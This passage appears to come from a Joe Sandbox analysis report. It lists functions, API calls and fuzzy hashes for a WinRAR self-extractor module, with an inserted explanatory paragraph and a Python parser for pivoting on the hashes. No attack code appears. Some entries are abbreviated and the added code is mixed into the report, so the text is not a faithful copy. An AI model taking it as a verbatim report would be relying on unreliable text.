                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                                      • String ID: WinRAR
                                                                                                                                                                                                                                      • API String ID: 977838571-3970807970
                                                                                                                                                                                                                                      • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                      • Instruction ID: 0fc626bd2effef7ca70c1ea947e78c36fcd0771b72fe94cc82ddb5227e231221
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D218E66A08B4280EA60AF22F8541BA73A0EF9AFD0B1960B1DF0EC7759DF3CD4548740
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF69A443CEF,?,?,00000000,00007FF69A443CAA,?,?,00000000,00007FF69A443FD9), ref: 00007FF69A4497A5
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF69A443CEF,?,?,00000000,00007FF69A443CAA,?,?,00000000,00007FF69A443FD9), ref: 00007FF69A449807
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF69A443CEF,?,?,00000000,00007FF69A443CAA,?,?,00000000,00007FF69A443FD9), ref: 00007FF69A449841
                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF69A443CEF,?,?,00000000,00007FF69A443CAA,?,?,00000000,00007FF69A443FD9), ref: 00007FF69A44986B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$Free
• String ID:
• API String ID: 1557788787-0
• Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
• Instruction ID: 9d407de6fbbee5277e4cec0748ff96fad806b78d10f7f131864c052806daf663
• Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
• Instruction Fuzzy Hash: 49218131E1879186EA708F17A440129B6E4FB84FD0F4842B5DE8EA3B95DF7CE8529344
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
• Instruction ID: 58ff6043a427ce57736917a17085703e0014dac74aa3e89a1b84a7358074386f
• Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
• Instruction Fuzzy Hash: 28216D21E0C56682EB708B29E40033972E4FFA3F98F1041F2EA59C66C4CE2DE880A741
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 502429940-0
• Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction ID: fe161080a398b2273fdc7b79eb58209b352f89f5ed7cff20477803a3204902e4
• Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction Fuzzy Hash: 07118236A14E4197E2249F20E54466DB3B0FBC6FA0F0012B1DBAE936A5CF39E476C704
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID:
• String ID: AFUM$default.sfx
• API String ID: 0-2491287583
• Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction ID: 27414e84092b83246333c804ae71f36974dce411904d1af4d7974dc6618c14d2
• Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction Fuzzy Hash: 0A81C022A1C68291FB709B1295002BD32E0EF51B84F4480FEDE8DC76D6DF6DA896E750
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: FileHandleType
• String ID: @
• API String ID: 3000768030-2766056989
• Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction ID: 8072d5cfdb551fb8525809fbf8b0b27b356f0211a16d2a5561b23ee20b80ec94
• Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction Fuzzy Hash: 09216122A1874241FB748F29A494139B6D5EB85F74F2813F5DA6E8B7D8CE38E881C341
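The function entries above all share the same memory dump source (process 0x41, the embedded RAR SFX module) and differ only in their Similarity fields, which is what an analyst pivots on across reports. The following parser is an added example, not Joe Sandbox code: it turns the report's "APIs"/"Strings" entry blocks into records, splits the "API ID" on the `$` separator the report uses, and runs two sanity checks that hold for every entry on this page (the "Opcode ID" equals the "Opcode Fuzzy Hash", and the "API String ID" is `<api>-<string>` with `0` on whichever side is empty). The two sample entries embedded in it are copied from the report with the leading whitespace and "Download File" link residue removed; the field names are the report's own bullet labels, and the entry-boundary rule (an entry starts at a label line, two consecutive labels belong to one entry) is an assumption taken from how the listing reads.

```python
"""Parse Joe Sandbox IDA-plugin function entries into records for hash pivoting.
Added example, not Joe Sandbox code.  Entry boundaries are inferred from the
listing's layout (an assumption); field names are the report's bullet labels."""
import re
from collections import defaultdict

# Two entries copied from the report (whitespace and link residue stripped).
SAMPLE = """APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
• Instruction ID: 58ff6043a427ce57736917a17085703e0014dac74aa3e89a1b84a7358074386f
• Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
• Instruction Fuzzy Hash: 28216D21E0C56682EB708B29E40033972E4FFA3F98F1041F2EA59C66C4CE2DE880A741
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID:
• String ID: AFUM$default.sfx
• API String ID: 0-2491287583
• Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction ID: 27414e84092b83246333c804ae71f36974dce411904d1af4d7974dc6618c14d2
• Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction Fuzzy Hash: 0A81C022A1C68291FB709B1295002BD32E0EF51B84F4480FEDE8DC76D6DF6DA896E750
"""

SECTION_LABELS = {"APIs", "Strings"}
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")


def parse_entries(text):
    """Split the listing into one dict per function entry.

    An entry starts at a label line ("APIs"/"Strings"); an entry tagged with
    both has two consecutive label lines.  Bullet fields become keys, and the
    repeated "Associated" bullets are accumulated into a list.  Group headers
    ("Memory Dump Source", "Similarity", ...) carry no data and are skipped.
    """
    entries, cur, prev_was_label = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_LABELS:
            if prev_was_label:
                cur["kinds"].append(line)      # second label of the same entry
            else:
                cur = {"kinds": [line], "Associated": []}
                entries.append(cur)
            prev_was_label = True
            continue
        prev_was_label = False
        if cur is None:
            continue                            # cut-off tail before the first label
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Associated":
            cur["Associated"].append(value)
        else:
            cur[key] = value
    return entries


def api_tokens(entry):
    """Split 'ErrorLast$FileHandleRead' on the '$' separator; a pure string
    entry (empty API ID) yields []."""
    return [t for t in entry.get("API ID", "").split("$") if t]


def consistency_issues(entries):
    """Checks to run before pivoting on these fields: Opcode ID must equal the
    Opcode Fuzzy Hash, and each half of 'API String ID' is 0 exactly when the
    corresponding ID is empty."""
    issues = []
    for i, e in enumerate(entries):
        if e.get("Opcode ID") != e.get("Opcode Fuzzy Hash"):
            issues.append((i, "Opcode ID differs from Opcode Fuzzy Hash"))
        api_part, _, str_part = e.get("API String ID", "").partition("-")
        if (api_part == "0") != (e.get("API ID", "") == ""):
            issues.append((i, "API String ID disagrees with API ID"))
        if (str_part == "0") != (e.get("String ID", "") == ""):
            issues.append((i, "API String ID disagrees with String ID"))
    return issues


def index_by_hash(entries, field="Instruction Fuzzy Hash"):
    """Map hash value -> entry indices, the lookup table used to match
    functions across reports of different samples."""
    idx = defaultdict(list)
    for i, e in enumerate(entries):
        if e.get(field):
            idx[e[field]].append(i)
    return dict(idx)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for e in parsed:
        print(e["kinds"], api_tokens(e), repr(e.get("String ID")), e["Instruction Fuzzy Hash"][:16])
    print("issues:", consistency_issues(parsed))
```

Feed it the whole function listing of a report and the `index_by_hash` table can be intersected with the same table from another sample's report; an empty `consistency_issues` result is the sign that the listing was extracted cleanly rather than with fields shifted between entries.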
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                      • String ID: CreateThread failed
                                                                                                                                                                                                                                      • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                      • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                      • Instruction ID: 373c51ce437382f8fbff48317b969f39a7aa1d6d819357ec93ef5c1c4ea501a8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1113D32A18A4282EB24DF24E8441A973A0FB84B84F5481F6EA9DC2669DF7CE557C740
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: the same ten associated dumps (00007FF69A3E0000 through 00007FF69A48E000) listed for the first function of this image above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CriticalSection$EnterEventLeave
• String ID:
• API String ID: 3094578987-0
• Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
• Instruction ID: 3d5be519be48939db660647394ebdf365ca9b0c92a5d372304d9636453a34513
• Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
• Instruction Fuzzy Hash: 43F01226A08A4682DE709F11E54407973A1FBC9F99F5451F0DE9DC6669CE2CD546CB00
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: the same ten associated dumps (00007FF69A3E0000 through 00007FF69A48E000) listed for the first function of this image above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ConsoleFileHandleModeType
• String ID:
• API String ID: 4141822043-0
• Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
• Instruction ID: 3b7b8918921a8e881d2d24468e236801415153e21926f30ede7782f57021b867
• Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
• Instruction Fuzzy Hash: D0E0EC28E1960247FF685761A8691B932D1DF9AB91F5420F8D90FCA350EE2C99868700
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: the same ten associated dumps (00007FF69A3E0000 through 00007FF69A48E000) listed for the first function of this image above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction ID: d9ac088e9db16a1ec6a5d6c58747c45d7741a1c0adadd9218bf7547056191142
• Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction Fuzzy Hash: AAE09A24A0874546EAA46F65988537933D2EF85F41F1065F8CD4EC7392CE3DA4498350
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: the same ten associated dumps (00007FF69A3E0000 through 00007FF69A48E000) listed for the first function of this image above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CharEnvironmentExpandStrings
• String ID:
• API String ID: 4052775200-0
• Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
• Instruction ID: 402870ea6cd7ac0447825b222b25c355c930196caa587547040f9f6e0fae56b0
• Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
• Instruction Fuzzy Hash: 71E1E022A186A285EB709F24D4001BE77E0FBA1B94F5441F1DB9E87AD9DF7CE481D780
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF69A3F7EBE,00000000,00000000,00000000,00000000,00000007,00007FF69A3F7C48), ref: 00007FF69A401B8D
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF69A3F7EBE,00000000,00000000,00000000,00000000,00000007,00007FF69A3F7C48), ref: 00007FF69A401BD7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                      • Instruction ID: 0c1b55147ec7c2f8d1211767fdd5718bdfbdcf1776c4c217e724078753035f66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 713124A3A1864146E7308F28E4053B976E0EB62F79F1043B4DEAC876C5DF7CC4858740
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f0c7fbb111e56d36465e4d818618f2f1e76dda2c5551dac30fb367d58ac609c7
                                                                                                                                                                                                                                      • Instruction ID: 42dd1cb871c97f502d7c48e59103f686977d0225ca358a3583df8bb143d037f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0c7fbb111e56d36465e4d818618f2f1e76dda2c5551dac30fb367d58ac609c7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C11B932609B8141EB24DB64E5003B9B2D4EFA4B94F2406B8D6DD8B7E6DF7DD051C300
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
